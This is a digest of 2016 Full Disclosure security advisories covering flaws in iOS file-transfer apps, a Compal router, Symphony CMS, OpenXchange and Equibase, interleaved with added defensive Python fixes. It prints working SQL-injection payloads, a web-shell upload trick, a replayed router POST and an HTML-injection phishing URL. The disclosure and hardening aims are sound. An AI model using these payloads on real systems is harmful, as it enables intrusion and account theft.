[FD] Soso Transfer v1.1 iOS - Denial of Service Vulnerability

2016-02-03 Thread Vulnerability Lab
Document Title:
===
Soso Transfer v1.1 iOS - Denial of Service Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1703


Release Date:
=
2016-02-02


Vulnerability Laboratory ID (VL-ID):

1703


Common Vulnerability Scoring System:

3


Product & Service Introduction:
===
Soso Transfer is the easiest and fastest way to transfer photos (videos) from 
Camera Roll to computer or other iOS devices, and vice versa. 
No need for USB cable, iTunes or extra equipment! “Simple but powerful! Not even 
a redundant step, it just lets you do what you want to do, 
a highly-recommended transfer app!

(Copy of the Homepage: 
https://itunes.apple.com/us/app/soso-transfer-wireless-backup/id1000466165 )



Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered a remote denial of 
service vulnerability in the official Soso Transfer mobile iOS web-application.


Vulnerability Disclosure Timeline:
==
2016-02-02: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Elite Tracy
Product: Soso Transfer - iOS (Web-Application) 1.1


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A remote denial of service web vulnerability has been discovered in the 
official Soso Transfer mobile iOS web-application.
The web vulnerability allows remote attackers to crash or shut down the 
application by supplying invalid values.

The vulnerability is located in the `path` value of the `show id` module. 
Remote attackers are able to request the show path with invalid ids. 
This results in a permanent shutdown of the mobile iOS web-application. The 
attacker injects only a small number of invalid values into the path location 
to crash the mobile web-application permanently. The request method to attack 
is GET and the attack vector of the issue is located on the client-side 
of the application. The issue is a classic denial of service issue that is 
exploited by an invalid value in the context of an application parameter.

The security risk of the denial of service vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 3.0. 
Exploitation of the denial of service web vulnerability requires no user 
interaction or privileged web-application user account. 
Successful exploitation of the application web vulnerability results in 
permanent application crashes or stable shutdowns.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./show/

Vulnerable Parameter(s):
[+] path as id


Proof of Concept (PoC):
===
The denial of service web vulnerability can be exploited by remote attackers in 
the local wifi network without privileged user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

--- PoC Session Logs [GET] ---
Status: 200[OK] 
GET http://localhost:3030/show/-1 Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
  Host[localhost:3030]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1]
-
Status: 200[OK] 
GET http://localhost:3030/show/- Load Flags[LOAD_DOCUMENT_URI  
LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[unknown] Mime Type[unknown]
   Request Header:
  Host[localhost:3030]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1]

Reference(s):
http://localhost:3030/show/


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure restriction of the show module's 
path id value. 
Disallow invalid values and use own exception handling to prevent denial of 
service issues via client-side GET parameter requests.


Security Risk:
==
The security risk of the denial of service web vulnerability in the wifi 
web-server interface application is estimated as medium. (CVSS 3.0)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(resea...@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
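
The fix the advisory asks for (restrict the show module's id value and handle exceptions in the handler) worked through as an added example; this is not code from the advisory or from the Soso Transfer app, whose server code is not on the page. The ITEMS table, the handler names and the status codes are this example's own assumptions; the request paths are the ones from the PoC session log.

```python
import re
from typing import Tuple

# Constructed in-memory item table standing in for the app's photo/video store;
# the real Soso Transfer storage is not described in the advisory.
ITEMS = {1: "IMG_0001.jpg", 2: "IMG_0002.jpg", 3: "MOV_0003.mov"}

# Only a short run of digits is a valid id; anything else is rejected up front.
SHOW_RE = re.compile(r"^/show/(\d{1,9})$")


def handle_show_unchecked(path: str) -> Tuple[int, str]:
    """The pattern the advisory describes: the id segment is trusted as-is.
    "-" makes int() raise ValueError and "-1" makes the lookup raise KeyError;
    an exception escaping the request handler is what brings the wifi
    web server down for good."""
    item_id = int(path.rsplit("/", 1)[-1])
    return 200, ITEMS[item_id]


def handle_show(path: str) -> Tuple[int, str]:
    """Hardened handler: strict id syntax, bounded lookup, and a catch-all so
    that no single bad request can propagate an exception out of the handler."""
    try:
        match = SHOW_RE.match(path)
        if match is None:
            return 400, "bad request: id must be a positive integer"
        name = ITEMS.get(int(match.group(1)))
        if name is None:
            return 404, "not found"
        return 200, name
    except Exception:
        # Last line of defence: fail this request, not the whole server.
        return 500, "internal error"


def serve(handler, paths) -> list:
    """Drive a handler the way a server loop would and collect status codes;
    an unhandled exception is recorded as "CRASH" and ends the loop."""
    statuses = []
    for path in paths:
        try:
            statuses.append(handler(path)[0])
        except Exception:
            statuses.append("CRASH")
            break
    return statuses


if __name__ == "__main__":
    probes = ["/show/1", "/show/-1", "/show/-", "/show/999", "/show/2"]
    print("unchecked:", serve(handle_show_unchecked, probes))
    print("hardened: ", serve(handle_show, probes))
```

The unchecked loop stops at the first malformed id and never serves the later, valid requests; the hardened one answers every request with a status code and keeps running, which is the whole point of the "own exception handling" the solution section asks for.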

[FD] Getdpd Bug Bounty #1 - (asm0option0) Persistent Web Vulnerability

2016-02-03 Thread Vulnerability Lab
Document Title:
===
Getdpd Bug Bounty #1 - (asm0option0) Persistent Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1464

ID:  #14770


Release Date:
=
2016-02-02


Vulnerability Laboratory ID (VL-ID):

1564


Common Vulnerability Scoring System:

3.6


Product & Service Introduction:
===
DPD is an all-in-one shopping cart and digital fulfillment service for 
downloadable products. Serving thousands of stores, DPD processes and 
delivers millions worth of downloads each year.

(Copy of the Vendor Homepage: https://getdpd.com/security )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research team discovered an application-side input 
validation web vulnerability in the official Getdpd online service 
web-application.


Vulnerability Disclosure Timeline:
==
2015-08-06: Researcher Notification & Coordination (Hadji Samir - Evolution 
Security GmbH)
2015-08-07: Vendor Notification (DPD Security Team - Bug Bounty Program)
2015-09-02: Vendor Response/Feedback (DPD Security Team - Bug Bounty Program)
2016-01-07: Vendor Fix/Patch (DPD Developer Team)
2016-02-02: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

DPD - Digital Product Delivery
Product: DPD Online Service (Web-Application) 2015 Q3


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

An application-side cross site scripting web vulnerability has been discovered 
in the official Getdpd online service web-application.
The security vulnerability allows remote attackers to inject own script code to 
the application-side of the affected application module.

The vulnerability is located in the input value id asm0option0 of the 
Button/Link creator module. Remote attackers with low privilege 
web-application user accounts are able to inject own malicious script code via 
POST method request. The injection point is the vulnerable 
id parameter with the title input and the execution point is located in 
storefront/productchooser?method=cart module. The request method 
to inject is POST and the vulnerability is located to the application-side of 
the vulnerable service.

The security risk of the application-side cross site vulnerability is estimated 
as medium with a cvss (common vulnerability scoring system) count of 3.9. 
Exploitation of the persistent input validation web vulnerability requires a 
low privilege web-application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects to malicious source 
and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] getdpd.com

Vulnerable Module(s):
[+] Button/Link creator

Vulnerable Parameter(s):
[+] 
storefront/productchooser?method=cart  (asm0option0)


Proof of Concept (PoC):
===
The security vulnerability can be exploited by remote attackers with low 
privilege web-application user account and low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Create new product with payload code( injection code)
2. Click to create Button/link creator  (https://getdpd.com/storefront/deploy)
3. Click Product Chooser 
(https://getdpd.com/storefront/productchooser?method=cart)
4. Product Chooser 
5. The payload code will execute!


PoC: Source

  Product Chooser
  Add products to your chooser using the 
pulldown on the left. Once added to the display below, sort them as you like by 
dragging and dropping. Click on a button to use it. Click on it again to remove 
it.  When you don't use a button, selecting from your chooser will 
automatically send you to the cart (or buy now).  Once you have it the way you 
like, copy the code and paste it on your site.
  

  
  undefinedhttps://getdpd.com/v2/cart/add/23787/114595/121094`` 
rel=``asm0option0`` class=>``> ($1.00)https://getdpd.com/v2/cart/add/23787/114625/121125`` 
rel=``asm0option1`` class=``asmOptionDisabled`` disabled=``disabled``>``> 
($1.00)Added: ``> 
($1.00)``> 

[FD] File Manager PRO v1.3 iOS - Multiple Web Vulnerabilities

2016-02-03 Thread Vulnerability Lab
Document Title:
===
File Manager PRO v1.3 iOS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1704


Release Date:
=
2016-02-03


Vulnerability Laboratory ID (VL-ID):

1704


Common Vulnerability Scoring System:

7.3


Product & Service Introduction:
===
Super Easy File Management with File Manager Pro. A must-have for your Device & 
Even More!! so Just download it, you'll wonder how you lived without it.
Add Photos & Videos from Library or directly Capture from Camera. Share Files 
via Wifi, E-mail, Dropbox & More.

(Copy of the Homepage: 
https://itunes.apple.com/us/app/file-manager-pro/id639528119 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered multiple 
vulnerabilities in the official File Manager PRO iOS mobile web-application.


Vulnerability Disclosure Timeline:
==
2016-02-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

RTC Hubs Limited
Product: File Manager PRO - iOS (Web-Application) 1.3


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

1.1
A local file include web vulnerability has been discovered in the official File 
Manager PRO iOS mobile web-application.
The file include vulnerability allows remote attackers to include unauthorized 
local file/path requests to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `Upload File` 
module. Attackers are able to inject own files with malicious 
`filename` values in the `upload` POST method request to compromise the mobile 
web-application. The local file/path include execution occcurs in 
the index file dir listing and sub folders of the wifi interface. The attacker 
is able to inject the local file include requests by usage of the 
`wifi interface` in connection with the vulnerable file upload POST method 
request. Injects are also possible via local app file sync function. 
Local attackers are also able to exploit the filename issue in combination with 
persistent injected script code to execute different malicious 
attack requests.

The security risk of the local file include vulnerability is estimated as high 
with a cvss (common vulnerability scoring system) count of 7.1. 
Exploitation of the local file include web vulnerability requires no user 
interaction or privileged web-application user account. 
Successful exploitation of the local file include vulnerability results in 
mobile application compromise or connected device component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload File

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir Listing 
(http://localhost:56963/)


1.2
An arbitrary file upload web vulnerability has been discovered in the official 
File Manager PRO iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with 
multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the `Upload File` module. Remote attackers are 
able to upload a php or js web-shells by renaming the file with 
multiple extensions to bypass the file restriction mechanism. The attacker 
uploads for example a web-shell with the following name and extension 
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the 
file in the web application. He deletes the .jpg & .gif file 
extensions and can access the application file with elevated access rights. 

The security risk of the arbitrary file upload web vulnerability is estimated 
as high with a cvss (common vulnerability scoring system) count of 7.3.
Exploitation of the arbitrary file upload web vulnerability requires no user 
interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in unauthorized file and 
device access because of a compromise after the upload of web-shells.


Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] Upload File

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Index File Dir Listing 
(http://localhost:56963/)


Proof of Concept (PoC):
===
1.1
The local file include web vulnerability can be exploited by remote attackers 
without privileged web-application user account or user 
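
An upload filename sanitizer that closes both issues above (1.1, directory parts in `filename`; 1.2, the multiple-extension trick) as an added example; it is not code from the advisory or from File Manager PRO, whose server code is not on the page. The extension allowlist and the accept() wrapper are this example's own choices; `image.jpg.gif.js.php.jpg` is the name from the advisory.

```python
import re
import unicodedata
from typing import Tuple

# Allowed final extensions for a photo/video manager (this example's choice).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "mov", "mp4", "pdf", "txt"}
# Extensions that must not appear anywhere in the name: a later rename of the
# trailing parts (the trick in the advisory) must not be able to expose them.
EXECUTABLE_EXT = {"php", "php3", "php5", "phtml", "js", "html", "htm", "sh", "py"}

UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def sanitize_filename(raw: str) -> str:
    """Return a safe stored name or raise ValueError.

    1. drop any directory part, whichever separator style is used
       (covers the local file/path include vector, 1.1);
    2. reduce the name to a conservative character set (no markup, no
       control characters, so nothing to carry injected script code);
    3. allow exactly one extension and require it on the allowlist
       (covers the multiple-extension bypass, 1.2)."""
    if not raw or "\x00" in raw:
        raise ValueError("empty or NUL-containing filename")
    name = unicodedata.normalize("NFKC", raw)
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    name = UNSAFE_CHARS.sub("_", name).strip("._")
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        raise ValueError("filename needs a base name and one extension")
    exts = [p.lower() for p in parts[1:]]
    embedded = sorted(set(exts) & EXECUTABLE_EXT)
    if embedded:
        raise ValueError(f"executable extension embedded in name: {embedded}")
    if len(exts) != 1:
        raise ValueError(f"multiple extensions not allowed: {exts}")
    if exts[0] not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {exts[0]}")
    return name


def accept(raw: str) -> Tuple[bool, str]:
    """Convenience wrapper: (True, stored_name) or (False, reason)."""
    try:
        return True, sanitize_filename(raw)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for candidate in ("holiday.JPG", "image.jpg.gif.js.php.jpg",
                      "../../etc/shadow", "<script>.png", "a.tar.gz"):
        print(repr(candidate), "->", accept(candidate))
```

Checking for executable extensions anywhere in the name, before the single-extension rule, is deliberate: it gives a precise rejection reason for the advisory's `image.jpg.gif.js.php.jpg` and also blocks names such as `photo.php.jpg` whose trailing part looks harmless.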

[FD] Compal ConnectBox Wireless - Passphrase Settings Filter Bypass Vulnerability

2016-02-03 Thread Vulnerability Lab
Document Title:
===
Compal ConnectBox Wireless - Passphrase Settings Filter Bypass Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1705


Release Date:
=
2016-02-03


Vulnerability Laboratory ID (VL-ID):

1705


Common Vulnerability Scoring System:

5.8


Product & Service Introduction:
===
Wireless modem CBN CH7465LG is the world's most compact voice modem. EuroDOCSIS 
3.0 in the stylish and elegant design suitable for home, 
home office or smaller businesses. It can be used in households with one or 
more computers with support. Wireless remote access to a wireless modem.

(Copy of the Homepage: https://infotomb.com/truac.pdf )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered a filter bypass web 
vulnerability in the official  Compal Wireless ConnectBox web-application.


Vulnerability Disclosure Timeline:
==
2016-02-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Compal
Product: ConnectBox - (Wireless) 4.01 - H7465LG-NCIP-4.50.18.15-1-NOSH


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A filter bypass web vulnerability has been discovered in the official Compal 
Wireless ConnectBox web-application.
The filter bypass web vulnerability allows an attacker to evade the controls of 
a restriction- or protection mechanism.

The issue allows an attacker to change the wireless passphrase to an insecure 
passphrase which is forbidden by the application's 
JavaScript engine. The vulnerability affects the `ConnectBox` manufactured by 
Compal for the local small ISP - Unitymedia. 
They are offering high-speed internet access over Cable (TV).

To bypass the filter you only need to replay the POST which changes the 
wireless passphrase and change the parameters `wlPSkey2g` 
and `wlPSkey5g`. The filter won't allow you to set a passphrase without 
special chars or uppercase/lowercase letters. By bypassing 
the filter you can set any passphrase (WPA needs at least 8 chars).

The security risk of the filter bypass vulnerability is estimated as medium and 
the cvss (common vulnerability scoring system) count is 5.8. 
Exploitation of the filter bypass vulnerability requires a privileged 
web-application user account with privileged access and medium user 
interaction. 
Successful exploitation of the vulnerability results in unauthorized access by 
setting a low secured passphrase key for wpa and wpa2.

Model: CH7465LG-LC 
Hardware Version: 4.01
Software Version: CH7465LG-NCIP-4.50.18.15-1-NOSH


Proof of Concept (PoC):
===
The vulnerability can be exploited by remote attackers in the local network 
with privileged web-application user account or privileged access and medium 
user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information or steps below to continue.

--- PoC Session Logs [POST] ---
Status: 200[Ok]
POST http://localhost/xml/setter.xml 
Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des 
Inhalts[-1] Mime Type[text/xml]
Request Header:
  Host[localhost]
  User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 
Firefox/44.0]
  Accept[text/plain, */*; q=0.01]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
  X-Requested-With[XMLHttpRequest]
  Referer[http://192.168.0.1/index.html]
  Content-Length[196]
  Cookie[SID=3524502016]
  Connection[keep-alive]
POST-Daten:
  token[3753771008]
  fun[318]
  wlBandMode2g[1]
  wlBandMode5g[1]
  wlSsid2g[0xdeadbeef]
  wlSsid5g[0xdeadbeef]
  wlPSkey2g[<[CHANGE RIGHT HERE]>]
  wlPSkey5g[<[CHANGE RIGHT HERE]>]
  wlSecurity2g[8]
  wlSecurity5g[8]
  wlWpaalg2g[3]
  wlWpaalg5g[3]
Response Header:
  Server[NET-DK/1.0]
  Date[Tue, 02 Feb 2016 14:12:02 GMT]
  Last-Modified[Mon, 12 Oct 2015 11:00:12 GMT]
  Pragma[no-cache]
  Expires[-1]
  Content-Type[text/xml]
  Connection[close]


Security Risk:
==
The security risk of the filter bypass web vulnerability in the web-application 
of the hardware models is estimated as medium. (CVSS 5.8)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Marco Onorati


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either 
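
The root cause above is a passphrase policy enforced only in the browser, so a replayed POST skips it. The following added example applies the same policy on the server side where the setter endpoint receives the form; it is not code from the advisory or from Compal's firmware. The field names wlPSkey2g/wlPSkey5g and the token/fun values are from the PoC log; the rule set (length, printable ASCII, upper and lower case, a special character) and the result dict are this example's own.

```python
import re
from urllib.parse import parse_qs

MIN_LEN, MAX_LEN = 8, 63  # WPA/WPA2-PSK passphrase length bounds (IEEE 802.11)

# Passphrase rules: these mirror what the advisory says the device's JavaScript
# enforces (upper/lower case and a special character), plus the length bound.
RULES = [
    (re.compile(r"[a-z]"), "needs a lowercase letter"),
    (re.compile(r"[A-Z]"), "needs an uppercase letter"),
    (re.compile(r"[^A-Za-z0-9]"), "needs a special character"),
]


def passphrase_problems(pw: str) -> list:
    """Return the list of policy violations (empty means acceptable)."""
    problems = []
    if not MIN_LEN <= len(pw) <= MAX_LEN:
        problems.append(f"length must be {MIN_LEN}-{MAX_LEN} characters")
    if any(not 0x20 <= ord(c) <= 0x7E for c in pw):
        problems.append("only printable ASCII is allowed")
    for pattern, message in RULES:
        if not pattern.search(pw):
            problems.append(message)
    return problems


def validate_setter_post(body: str) -> dict:
    """Check the passphrase fields of an application/x-www-form-urlencoded
    body as the device's setter endpoint would receive it. The field names
    wlPSkey2g and wlPSkey5g are the ones in the advisory; the dict layout of
    the result is this example's own."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    errors = {}
    for field in ("wlPSkey2g", "wlPSkey5g"):
        if field in form:
            problems = passphrase_problems(form[field])
            if problems:
                errors[field] = problems
    # Reject the whole update if any passphrase fails: a half-applied change
    # would leave one band weaker than the other.
    return {"accepted": not errors, "errors": errors}


if __name__ == "__main__":
    # Constructed replay of the PoC POST with a weak key in both fields.
    replayed = "token=3753771008&fun=318&wlPSkey2g=password&wlPSkey5g=password"
    print(validate_setter_post(replayed))
```

The client-side JavaScript can stay as a usability aid; the server check is the one that counts, because it runs on every request regardless of which client, or replay tool, sent it.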

[FD] Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities

2016-02-03 Thread Sachin Wagh

Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities


Information

Vulnerability Type : Multiple SQL Injection Vulnerabilities
Vendor Homepage: http://www.getsymphony.com/
Vulnerable Version: Symphony CMS 2.6.3
Fixed Version: Symphony CMS 2.6.5
Severity: High
Author – Sachin Wagh (@tiger_tigerboy)

Description


The vulnerability is located in the 'fields[username]','action[save]' and
'fields[email]' of the '/symphony/system/authors/new/' page.

Proof of Concept

*1. fields[username] (POST)*

Parameter: fields[username] (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=-6697' OR 7462=7462#[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=-8105' OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachin[username]=sachin123' OR SLEEP(5)#[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author
---
[14:09:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0.12

*2. fields[email] (POST)*

Parameter: fields[email] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachi...@mail.com' AND 4852=4852 AND 'dqXl'='dqXl[username]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachi...@mail.com' AND (SELECT 8298 FROM(SELECT COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(8298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pmvq'='Pmvq[username]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachi...@mail.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND 'hKvH'='hKvH[username]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author

*3. action[save] (POST)*

Parameter: action[save] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ[first_name]=sachin[last_name]=sachin[email]=sachi...@mail.com[username]=sachinnn123[user_type]=author[password]=sachin[password-confirmation]=sachin[auth_token_active]=no[default_area]=3[save]=Create Author%' AND 8836=8836 AND '%'='

---
[12:23:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0

Vulnerable Product:
[+] Symphony CMS 2.6.3

Vulnerable Parameter(s):

[+]fields[username] (POST)
[+]fields[email] (POST)
[+]action[save] (POST)

Affected Area(s):
[+] http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/


Disclosure Timeline:

Vendor notification: Jan 29, 2016
Public disclosure: Jan 30, 2016
Credits & Authors

Sachin Wagh (@tiger_tigerboy)


-- 
Best Regards,

*Sachin Wagh*

___
Sent through the Full Disclosure mailing list
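
The sqlmap output above shows the classic symptom: a quote in a form field changes the structure of the SQL statement. The following added example reproduces that on a constructed SQLite table and shows the parameterized form that closes it; it is not code from the advisory or from Symphony CMS, whose author-creation code is not on the page. The table schema, the function names and the use of SQLite are this example's own; the injected value is the advisory's boolean-based username payload with MySQL's `#` comment replaced by the `--` comment SQLite understands.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed author table standing in for Symphony's authors table;
    the real schema is not on the page and this one serves the demo only."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE authors (id INTEGER PRIMARY KEY, username TEXT UNIQUE, email TEXT)"
    )
    con.executemany(
        "INSERT INTO authors (username, email) VALUES (?, ?)",
        [("admin", "admin@example.invalid"), ("sachin", "sachin@example.invalid")],
    )
    return con


# The advisory's boolean-based payload, with MySQL's "#" comment replaced by the
# "--" comment SQLite understands; the structure-changing part is the same.
INJECTED_USERNAME = "-6697' OR 7462=7462 --"


def username_taken_vulnerable(con: sqlite3.Connection, username: str) -> bool:
    """Input concatenated into the statement. The quote in the payload closes
    the literal and the rest becomes SQL, so the WHERE clause is always true
    and the check reports as taken a name that is not in the table."""
    sql = f"SELECT COUNT(*) FROM authors WHERE username = '{username}'"
    return con.execute(sql).fetchone()[0] > 0


def username_taken_safe(con: sqlite3.Connection, username: str) -> bool:
    """Parameterized statement: the driver sends the value separately from the
    SQL text, so quote characters in the input cannot alter its structure."""
    row = con.execute(
        "SELECT COUNT(*) FROM authors WHERE username = ?", (username,)
    ).fetchone()
    return row[0] > 0


def compare(username: str) -> dict:
    """Run both variants against a fresh table for one input."""
    con = make_db()
    return {
        "vulnerable": username_taken_vulnerable(con, username),
        "safe": username_taken_safe(con, username),
    }


if __name__ == "__main__":
    print("existing name :", compare("sachin"))
    print("injected value:", compare(INJECTED_USERNAME))
```

The same placeholder discipline applies to every field in the form, `fields[email]` and `action[save]` included: the three parameters in the advisory differ only in which literal the payload closes.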

[FD] OpenXchange | Information Disclosure

2016-02-03 Thread t . schughart

Hi@all,

there is an information disclosure in OpenXchange (prior to 7.8).
An authenticated user can enumerate all imap user folders. If you browse 
the PoC you get a permission denied error, but the folder’s name is 
reflected into the page in json format.


About Open Xchange:
Open-Xchange[2] develops, markets and sells web-based communication, 
collaboration and office productivity software, which enables full 
integration of email, documents, scheduling and social media


Risk-Rating: Very low

PoC:
https://ox.com/appsuite/api/tasks?action=all=10>=6%2C20%2C200%2C202%2C203%2C221%2C300%2C309=202=asc=UTC=

You have to paste your valid session. The vulnerable parameter is 
folder. It requires an integer.


The vendor has been informed and fixed the Bug in newest Version.

Best regards

Tim Schughart
IT Security engineer

ProSec Networks
Website: https://www.prosec-networks.com
E-Mail: i...@prosec.networks.com
Phone: +49(0) 2621 9469 252

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Equibase.com HTML Injection/Possible Reflected XSS

2016-02-03 Thread Russell Butturini
Vulnerability Type:
HTML Injection (Possible XSS)

Title:
Equibase.com HTML Injection

Site Description:

Equibase.com is the official source for horse racing results, mobile
racing data, statistics as well as all other horse racing and
thoroughbred racing information.


Details:

The page http://www.equibase.com/profiles/results.cfm has a parameter
called type (e.g.
http://www.equibase.com/profiles/Results.cfm?type=Horse) that has a
limited set of valid values.  The input for this parameter is rendered
unmodified in the output. This allows for reflected HTML injection and
content spoofing such as:

http://www.equibase.com/profiles/Results.cfm?type=%3Ch1%3E%3Cb%3EAn%20error%20occured.%20%20Please%20visit%20www.badguysite.com%20and%20log%20in%20to%20your%20equibase%20account%20to%20continue.%3C/b%3E%3C/h1%3E


Various other HTML tags were accepted and rendered.  Some limited
filtering did appear to be in place for XSS mitigation, as basic XSS
attacks did not work.  Since this was not a sanctioned test by the
site owner, extensive reflected XSS testing in this parameter was not
performed, but based on observation the filtering in place did not appear
to be sufficient to stop an advanced reflected XSS attack.

Vulnerability Severity:  Medium

Vendor Interaction:

Vendor notified on 1/17 with full report. No response received.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
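
Both this report and the earlier Getdpd advisory in this digest come down to user input written into HTML without context-aware handling: here a reflected `type` parameter that should only ever take one of a few values, there a stored product title rendered into the product chooser's link markup. The following added example covers both; it is not code from either report or from either site. "Horse" is the only `type` value shown on the page, so the other allowlist entries are constructed; the link markup is modelled on the cart URLs in the Getdpd PoC but its exact shape, and the function names, are this example's own.

```python
import html
import re

# Reflected case (Equibase report): `type` selects from a small fixed set of
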